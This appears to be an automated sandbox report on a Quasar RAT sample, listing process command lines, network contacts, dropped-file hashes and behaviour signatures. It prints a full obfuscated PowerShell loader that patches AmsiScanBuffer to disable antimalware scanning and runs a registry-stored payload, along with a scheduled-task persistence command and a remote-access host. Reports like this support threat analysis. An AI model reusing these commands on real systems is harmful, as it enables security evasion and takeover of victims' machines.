C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:jPOTZZnLVgzG{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$aAXEImPJtrzNYO,[Parameter(Position=1)][Type]$zTckOoxhtk)$IciMnqAwgQT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Refl'+'e'+''+[Char](99)+''+'t'+''+'e'+'d'+'D'+''+[Char](101)+''+[Char](108)+'e'+'g'+'a'+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+''+[Char](121)+''+[Char](77)+'o'+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+'g'+''+'a'+'t'+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+'e'+'',''+[Char](67)+''+'l'+''+[Char](97)+'s'+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+'a'+[Char](108)+''+[Char](101)+''+'d'+''+','+''+[Char](65)+''+'n'+''+[Char](115)+''+'i'+''+[Char](67)+''+[Char](108)+'as'+'s'+''+','+''+'A'+''+[Char](117)+''+[Char](116)+''+'o'+''+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$IciMnqAwgQT.DefineConstructor('R'+[Char](84)+'S'+'p'+''+[Char](101)+''+'c'+''+'i'+''+[Char](97)+''+[Char](108)+'N'+'a'+'m'+'e'+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+'P'+'u'+[Char](98)+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$aAXEImPJtrzNYO).SetImplementationFlags('R'+[Char](117)+''+'n'+'ti'+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+'a'+''+'n'+'ag'+[Char](101)+''+[Char](100)+'');$IciMnqAwgQT.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+',H'+[Char](105)+''+'d'+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+'S'+'l'+[Char](111)+'t'+[Char](44)+'V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+'a'+''+[Char](108)+'',$zTckOoxhtk,$aAXEImPJtrzNYO).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+'Ma'+[Char](110)+''+[Char](97)+''+[Char](103)+'ed');Write-Output $IciMnqAwgQT.CreateType();}$ODtuyioWfkvie=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+'s'+''+'t'+''+[Char](101)+''+[Char](109)+'.'+[Char](100)+''+'l'+''+[Char](108)+'')}).GetType('M'+[Char](105)+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+'o'+''+'f'+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+[Char](46)+''+'U'+'n'+[Char](115)+'af'+[Char](101)+''+[Char](78)+'a'+'t'+''+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+''+'e'+''+'t'+''+[Char](104)+'od'+[Char](115)+'');$DxsLfwWrPmrHkD=$ODtuyioWfkvie.GetMethod(''+'G'+''+[Char](101)+''+'t'+'Pr'+[Char](111)+''+'c'+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+'l'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'t'+''+'a'+'t'+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$XongVEnNdDRLHqIxgor=jPOTZZnLVgzG @([String])([IntPtr]);$zuwNZkcwaEQUuSTCuBwRTu=jPOTZZnLVgzG @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$eTvejnJjRAF=$ODtuyioWfkvie.GetMethod(''+[Char](71)+'e'+'t'+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+'le'+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+'k'+''+'e'+''+'r'+''+[Char](110)+''+'e'+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')));$isIAhxWxeWuUkv=$DxsLfwWrPmrHkD.Invoke($Null,@([Object]$eTvejnJjRAF,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+'d'+'Li'+'b'+''+[Char](114)+''+'a'+''+[Char](114)+'y'+'A'+'')));$FvzJfCbJzYrGWtoMI=$DxsLfwWrPmrHkD.Invoke($Null,@([Object]$eTvejnJjRAF,[Object](''+'V'+'i'+[Char](114)+'t'+[Char](117)+'a'+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+'tec'+'t'+'')));$BDeAEXe=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($isIAhxWxeWuUkv,$XongVEnNdDRLHqIxgor).Invoke('am'+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$EkkaUtGXMjMBchmQF=$DxsLfwWrPmrHkD.Invoke($Null,@([Object]$BDeAEXe,[Object]('A'+[Char](109)+''+[Char](115)+''+'i'+'Sc'+[Char](97)+''+[Char](110)+''+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+'e'+[Char](114)+'')));$MsCvePHDti=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FvzJfCbJzYrGWtoMI,$zuwNZkcwaEQUuSTCuBwRTu).Invoke($EkkaUtGXMjMBchmQF,[uint32]8,4,[ref]$MsCvePHDti);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$EkkaUtGXMjMBchmQF,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FvzJfCbJzYrGWtoMI,$zuwNZkcwaEQUuSTCuBwRTu).Invoke($EkkaUtGXMjMBchmQF,[uint32]8,0x20,[ref]$MsCvePHDti);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+'R'+'E').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+[Char](115)+''+'t'+''+'a'+''+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\SysWOW64\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77New.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\New.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{44d1d4c6-7289-459a-94d1-3a816bd598a1}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KilafD9X51NS.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.136.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | runderscore00-25501.portmap.host | udp |
| DE | 193.161.193.99:25501 | runderscore00-25501.portmap.host | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.193.161.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
Files
memory/4736-0-0x0000000074FDE000-0x0000000074FDF000-memory.dmp
memory/4736-1-0x0000000005490000-0x00000000054C6000-memory.dmp
memory/4736-2-0x0000000005B50000-0x0000000006178000-memory.dmp
memory/4736-3-0x0000000074FD0000-0x0000000075780000-memory.dmp
memory/4736-4-0x0000000074FD0000-0x0000000075780000-memory.dmp
memory/4736-5-0x00000000062B0000-0x00000000062D2000-memory.dmp
memory/4736-6-0x0000000006370000-0x00000000063D6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xw5siapq.1yl.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4736-7-0x00000000063E0000-0x0000000006446000-memory.dmp
memory/4736-17-0x0000000006450000-0x00000000067A4000-memory.dmp
memory/4736-18-0x0000000006930000-0x000000000694E000-memory.dmp
memory/4736-19-0x00000000069E0000-0x0000000006A2C000-memory.dmp
memory/4736-20-0x0000000009170000-0x00000000097EA000-memory.dmp
memory/4736-21-0x0000000006F10000-0x0000000006F2A000-memory.dmp
memory/4736-22-0x0000000006EB0000-0x0000000006EB8000-memory.dmp
memory/4736-23-0x0000000008BB0000-0x0000000008CA2000-memory.dmp
memory/4736-24-0x000000000ADA0000-0x000000000B344000-memory.dmp
memory/4836-26-0x0000000074FD0000-0x0000000075780000-memory.dmp
memory/4836-27-0x0000000074FD0000-0x0000000075780000-memory.dmp
memory/4836-37-0x0000000074FD0000-0x0000000075780000-memory.dmp
memory/4836-39-0x0000000070DF0000-0x0000000070E3C000-memory.dmp
memory/4836-38-0x0000000007180000-0x00000000071B2000-memory.dmp
memory/4836-49-0x0000000006570000-0x000000000658E000-memory.dmp
memory/4836-50-0x0000000074FD0000-0x0000000075780000-memory.dmp
memory/4836-51-0x00000000071C0000-0x0000000007263000-memory.dmp
memory/4836-52-0x0000000074FD0000-0x0000000075780000-memory.dmp
memory/4836-53-0x0000000007350000-0x000000000735A000-memory.dmp
memory/4836-54-0x0000000007550000-0x00000000075E6000-memory.dmp
memory/4836-55-0x00000000074D0000-0x00000000074E1000-memory.dmp
memory/4836-56-0x0000000074FD0000-0x0000000075780000-memory.dmp
memory/4836-59-0x0000000074FD0000-0x0000000075780000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 55d32bc1c206428fe659912b361362de |
| SHA1 | 7056271e5cf73b03bafc4e616a0bc5a4cffc810f |
| SHA256 | 37bd9078411576470f38bed628682d66786194692355541cd16f323e8f17c1ff |
| SHA512 | 2602abc70c0ed7e5ba63a3c7190015c2b30aa3223fbbe65fd9ddc001e84ab393bb172a9488dd988cd6368d668ab8608f85dc03cdb7c9561e904e3f7ce103485c |
C:\Users\Admin\AppData\Roaming\startup_str_482.vbs
| MD5 | 7c8956b43fdf23829e8da947749dd4e1 |
| SHA1 | e5e0e2e533f6d88758452e67382560cf045b7eda |
| SHA256 | a1d3b4e27923b07a6b5d0cdeeed244b795952fa90b1471b3aae81d4da89fdc0d |
| SHA512 | a9c15b6242d7acd6b49e1e0f463570860331b8fbcb21d04b56d3f9d3d907c6b55efe49d9da18a79ea304503bf724941a2dc113a96824446cefa451a01383311e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b2239c642ae37b49c99bffc889acee07 |
| SHA1 | 099e9ac47f4d462e35a8cf461d60f5036f60bbfd |
| SHA256 | 5ae136d55240d4569365ae03b2aa4954002ff3ca62e00c16edb79a7f4c03afb8 |
| SHA512 | 850ea2f5e8c231a98aa2992653be4ba70008b3616bb34e50426cfdace84510e0363a228712083869f1168a5bfca04fdc13c870b542ce7c81d0d8b2fc27d9473d |
C:\Users\Admin\AppData\Roaming\startup_str_482.bat
| MD5 | f6d5bfaee8a55ff72c7b453fda066d62 |
| SHA1 | 7d737d53013990e5d05076b7206e43eb4793fc7f |
| SHA256 | 3ff8b6a041a96625d730dfe770eb6e84be8ce99fc50a0027724e48394f053308 |
| SHA512 | e300c15bef9e898e7abd4ecf6759c0e60829e8d9b507e257359b0c0342c56d56adf7924c76ffbbee4c42e1b1ea229b7032d177849d2668720090780190b7f284 |
memory/4716-82-0x0000000008C70000-0x0000000008CDC000-memory.dmp
memory/4716-83-0x000000000A4B0000-0x000000000A542000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\New.exe
| MD5 | cf570b21f42f0ce411b7c9961068931e |
| SHA1 | f92aa688a1dbd64a4585ecfe80a9c2d7f408c57d |
| SHA256 | d0c4045c70a0822806a4e56d7883821cd2c19362f1cfed3bcbdb1e1b8eb15234 |
| SHA512 | de9dce8300656cd8531569011d043373193cbda125b738e66a5bf107178b48781d6dc88eea696b2074c352a1bf56a4693cfae62e668993ac24ce18aebfdcd684 |
C:\Users\Admin\AppData\Local\Temp\Install.exe
| MD5 | b51552b77057c2405f73bbbf9c89234a |
| SHA1 | 4793adbba023f90d2d2ad0ec55199c56de815224 |
| SHA256 | 720e6962d75e37e8b47b160c5b3f60433a341f00abf60041630116b26858fbb0 |
| SHA512 | 564f4104e6e398eeef8acc7ce7cab694b6eebbe4233b7cb359829242b949dc7c5bf124a550a4d0402eb7da19b8bec6c1f6753563b17a8ae36fb639be595b8d66 |
memory/4736-95-0x0000000074FD0000-0x0000000075780000-memory.dmp
memory/4748-101-0x0000000000990000-0x00000000009FC000-memory.dmp
memory/4716-103-0x0000000008960000-0x0000000008972000-memory.dmp
memory/3504-113-0x0000023A32200000-0x0000023A32222000-memory.dmp
memory/4716-114-0x000000000A850000-0x000000000A88C000-memory.dmp
memory/4716-117-0x0000000008A70000-0x0000000008A7A000-memory.dmp
memory/3504-118-0x0000023A346F0000-0x0000023A3471A000-memory.dmp
memory/3504-119-0x00007FFDBC710000-0x00007FFDBC905000-memory.dmp
memory/3504-120-0x00007FFDBAE90000-0x00007FFDBAF4E000-memory.dmp
memory/2320-121-0x0000000140000000-0x0000000140008000-memory.dmp
memory/2320-124-0x0000000140000000-0x0000000140008000-memory.dmp
memory/2320-123-0x0000000140000000-0x0000000140008000-memory.dmp
memory/2320-122-0x0000000140000000-0x0000000140008000-memory.dmp
memory/2320-126-0x0000000140000000-0x0000000140008000-memory.dmp
memory/2320-130-0x00007FFDBAE90000-0x00007FFDBAF4E000-memory.dmp
memory/2320-129-0x00007FFDBC710000-0x00007FFDBC905000-memory.dmp
memory/2320-131-0x0000000140000000-0x0000000140008000-memory.dmp
memory/604-134-0x00000170F2790000-0x00000170F27B5000-memory.dmp
memory/604-135-0x00000170F27C0000-0x00000170F27EA000-memory.dmp
memory/604-142-0x00007FFD7C790000-0x00007FFD7C7A0000-memory.dmp
memory/604-141-0x00000170F27C0000-0x00000170F27EA000-memory.dmp
memory/604-136-0x00000170F27C0000-0x00000170F27EA000-memory.dmp
memory/660-146-0x000001CBC62E0000-0x000001CBC630A000-memory.dmp
memory/660-151-0x000001CBC62E0000-0x000001CBC630A000-memory.dmp
memory/660-152-0x00007FFD7C790000-0x00007FFD7C7A0000-memory.dmp
memory/936-156-0x00000224E9640000-0x00000224E966A000-memory.dmp
memory/936-161-0x00000224E9640000-0x00000224E966A000-memory.dmp
memory/936-162-0x00007FFD7C790000-0x00007FFD7C7A0000-memory.dmp
memory/1000-166-0x000001BCE2160000-0x000001BCE218A000-memory.dmp
memory/1000-171-0x000001BCE2160000-0x000001BCE218A000-memory.dmp
memory/1000-172-0x00007FFD7C790000-0x00007FFD7C7A0000-memory.dmp
memory/528-182-0x00007FFD7C790000-0x00007FFD7C7A0000-memory.dmp
memory/528-181-0x00000231868B0000-0x00000231868DA000-memory.dmp
memory/528-176-0x00000231868B0000-0x00000231868DA000-memory.dmp
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
| MD5 | 1e8e2076314d54dd72e7ee09ff8a52ab |
| SHA1 | 5fd0a67671430f66237f483eef39ff599b892272 |
| SHA256 | 55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f |
| SHA512 | 5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
| MD5 | 0b990e24f1e839462c0ac35fef1d119e |
| SHA1 | 9e17905f8f68f9ce0a2024d57b537aa8b39c6708 |
| SHA256 | a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a |
| SHA512 | c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
| MD5 | ceb7caa4e9c4b8d760dbf7e9e5ca44c5 |
| SHA1 | a3879621f9493414d497ea6d70fbf17e283d5c08 |
| SHA256 | 98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9 |
| SHA512 | 1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
| MD5 | 7d612892b20e70250dbd00d0cdd4f09b |
| SHA1 | 63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5 |
| SHA256 | 727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02 |
| SHA512 | f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
| MD5 | 8abf2d6067c6f3191a015f84aa9b6efe |
| SHA1 | 98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7 |
| SHA256 | ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea |
| SHA512 | c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
| MD5 | f313c5b4f95605026428425586317353 |
| SHA1 | 06be66fa06e1cffc54459c38d3d258f46669d01a |
| SHA256 | 129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b |
| SHA512 | b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890 |
C:\Users\Admin\AppData\Local\Temp\KilafD9X51NS.bat
| MD5 | 49cd78f46e78a84286a9ddd78033eb3c |
| SHA1 | 68505a3f205b4ca6ba97bf3a1e61c71c61de398d |
| SHA256 | ce78b249a0155093be008dbac2867545e1b820cb5d875d00985b898e382b9aee |
| SHA512 | b20f60813134e79a2c94be3138ef19e8d8f366ae3690397c6fd8e97c4301102ce21a4291bd39b1dee139824299afaddb3fbab22e31052b8274baf58d183c5018 |
C:\Users\Admin\AppData\Roaming\$sxr-Logs\05-28-~1
| MD5 | 9ec350de7fb81cf30f916415384c3760 |
| SHA1 | d1399e56806e70a00732b3acfe5c1ab3b41e8ff5 |
| SHA256 | 4ba1523cb59e38e23224dbc33f7b25f1222de0d935795e3c43ec985265bd29d3 |
| SHA512 | fee1ca32861bb4b314717046ac39c3ecf008e454bc75a6e4779a10adcf0cc74c3d3bc6991aae49ec9c3397f0273d0c14625aea6cdd6ab70c133c33364a22ccf6 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-28 13:52
Reported
2024-05-28 13:56
Platform
win11-20240426-en
Max time kernel
217s
Max time network
217s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1704 created 636 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Install.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1704 set thread context of 1896 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\SCHTASKS.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
